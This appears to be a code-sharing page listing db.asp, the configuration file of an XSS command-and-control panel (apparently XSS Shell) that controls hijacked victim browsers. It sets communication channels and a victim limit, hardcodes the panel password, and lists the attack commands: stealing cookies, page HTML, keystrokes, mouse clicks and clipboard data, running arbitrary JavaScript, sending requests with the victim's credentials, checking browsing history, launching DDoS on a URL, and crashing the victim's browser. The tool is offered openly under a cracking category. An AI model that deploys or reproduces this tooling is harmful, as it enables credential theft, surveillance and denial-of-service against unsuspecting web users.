db.asp
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:3k
源码类别:

破解

开发平台:

ASP/ASPX

  1. <%
  2. '// By Ferruh Mavituna | http://ferruh.mavituna.com
  3. ' 09/08/2006
  4. ' - Started
  5. '
  6. ' 30/10/2006
  7. ' - DBNAME changed with DBPATH
  8. '
  9. '31/10/2006
  10. ' - Password protection added
  11. Option Explicit
  12. '60 minutes
  13. Session.Timeout = 60
  14. 'Open In Live Enviroments
  15. 'On error resume next
  16. '// DATABASE CONFIGURATION
  17. Const DBPATH = "..dbshell.mdb"
  18. 'Activity check time as seconds
  19. Const Activity = "10"
  20. Const SQLSERVER = False
  21. Const XMLHTTP = 0
  22. Const IFRAME = 1
  23. Const IMG = 2
  24. Const JSMODEL = 3
  25. Dim COMMUNICATIONCHANNEL
  26. COMMUNICATIONCHANNEL = JSMODEL
  27. 'Application Version
  28. Const APPVER = "0.3.8"
  29. 'Default Records Count to show
  30. Const DEFAULT_REC = 10
  31. Const MAX_COMMAND = 5
  32. Const MAX_VICTIM = 200
  33. ' Data Seperator
  34. Const DATA_SEPERATOR = "|.|"
  35. 'Determine to accept every request or only valid Attack IDs (expected IDs)
  36. Dim ACCEPT_EVERY_REQUEST 
  37. ACCEPT_EVERY_REQUEST = False
  38. 'Broadcast attacks Always accept
  39. Const BROADCAST_ATTACK = 336699
  40. '// Constants for JS Connector implementation
  41. Const HTMLPAGE = 1
  42. Const TEXT = 2
  43. Const COMMAND_SEPERATOR = "{|}"
  44. Dim Commands
  45. 'var CMD_GETCOOKIE = 1;
  46. 'var CMD_GETSELFHTML = 2 ;
  47. 'var CMD_ALERT = 3;
  48. 'var CMD_YESNO = 4;
  49. 'var CMD_EVAL = 5;
  50. ' Avaliable Commands
  51. Commands = Array("getCookie()",1,"Get victims active cookie", "getSelfHtml()",2,"Get victim's current page HTML Code", "alert(<message>)",3,"Send message to victim", "eval(<javascript code>)",5,"Execute virtually anything in JS","prompt(<question>)",4,"Play Truth or Dare","getKeyloggerData()",6,"Get keylogger data", "getMouseLog()", 7, "Get mouse log (every click in screen)", "getClipboard()", 8, "Get clipboard data (only IE)", "getInternalIP()", 9, "Get internal IP address (only Mozilla* + JVM)", "checkVisitedLinks(<url list>)",11,"Check victim's history (seperated by new line)", "getPage(<Relative URL Path>)",12,"Make a request with victim credentials", "DDoS(<url>)", 13, "Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)", "Crash()", 14, "Consume victim's CPU and force to crash/close.") 
  52. 'Hidden command STOPDOS = 15
  53. '// Error Codes
  54. Const NO_RECORD = 0
  55. Const FAILED = 0
  56. Const SUCCESS = 1
  57. Const NON_ERROR = 2
  58. 'Global
  59. Dim Title
  60. '// DB Connection
  61. Dim fmconn, fmconnexe, fmconnpath
  62. fmconnpath = Server.MapPath(DBPATH) 
  63. 'Response.Write fmconnpath : Response.End
  64. If SQLSERVER Then
  65. fmconn = "Provider=sqloledb;" & _
  66.    "Data Source=" & SQLIP & ";" & _
  67.    "Initial Catalog=***;" & _
  68. "User ID=***;" & _
  69. "Password=***"
  70. fmconnexe = fmconn
  71. Else '// Access
  72. fmconn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & fmconnpath
  73. fmconnexe = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & fmconnpath
  74. End If
  75. '// Password protected pages
  76. Sub protected()
  77. Dim ThisPage
  78. ThisPage = Server.HtmlEncode(Request.ServerVariables("SCRIPT_NAME"))
  79. '// Set Session + password is Case Sensitive
  80. If Request.Form("pass") <> "" Then
  81. If Trim(Request.Form("pass")) = "w00t" Then Session("level") = "ok"
  82. Response.Redirect "?"
  83. End If
  84. '// Logout (xxx.asp?logout=ok)
  85. If Request.Querystring("logout") <> "" Then Session("level") = ""
  86. '// Ask for Login
  87. If Session("level") <> "ok" Then
  88. Response.Write "<form method=""post"" action=""" & ThisPage & """><input type=""password"" name=""pass"" /><input type=""submit"" value=""Login""/></form>"
  89. Response.End
  90. End If
  91. End Sub
  92. '// Include Library
  93. %>
  94. <!--#include file="fmlibrary/fmlibraryv3.asp" -->